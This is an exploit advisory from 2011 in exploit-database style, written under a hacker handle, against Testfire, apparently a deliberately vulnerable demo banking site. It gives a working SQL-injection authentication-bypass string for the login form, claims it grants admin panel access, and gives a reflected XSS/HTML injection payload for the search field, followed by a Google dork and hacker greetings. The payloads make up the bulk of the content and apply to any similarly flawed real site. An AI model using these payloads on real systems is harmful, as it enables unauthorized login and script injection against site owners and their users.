

# Exploit Title: Testfire Multiple Vulnerabilities
# Vendor: www.testfire.net
# Date: 22nd July, 2011
# Author: $#4d0\/\/[r007k17] a.k.a Raghavendra Karthik D (http://www.shadowrootkit.wordpress.com)
# Google Dork: Copyright © 2011, Watchfire Corporation
************************************************************
************************************************************
*****************************************************************
(Auth ByPass) SQLi Vulnerability
***************************************
{DEMO} : http://demo.testfire.net/bank/login.aspx

EXPLOIT:
                 Username: ' or 'bug'='bug
                 Password: ' or 'bug'='bug
Observe: An attacker can use this authentication bypass to get into the admin
panel of the site.

Reflected XSS Vulnerability
********************************
EXPLOIT 2: Reflected XSS (& HTML) Vulnerability (search field)

{DEMO} : http://demo.testfire.net/search.aspx

EXPLOIT:
                 ">><marquee><h1><b><a href="http://www.google.com">BUG</a></b></h1></marquee>

************************************************************
************************************************************
*****************************************************************
gr33t1ngs to s1d3 effects and my friends@!21/\/ _3lda@!3.14--
************************************************************
************************************************************
*****************************************************************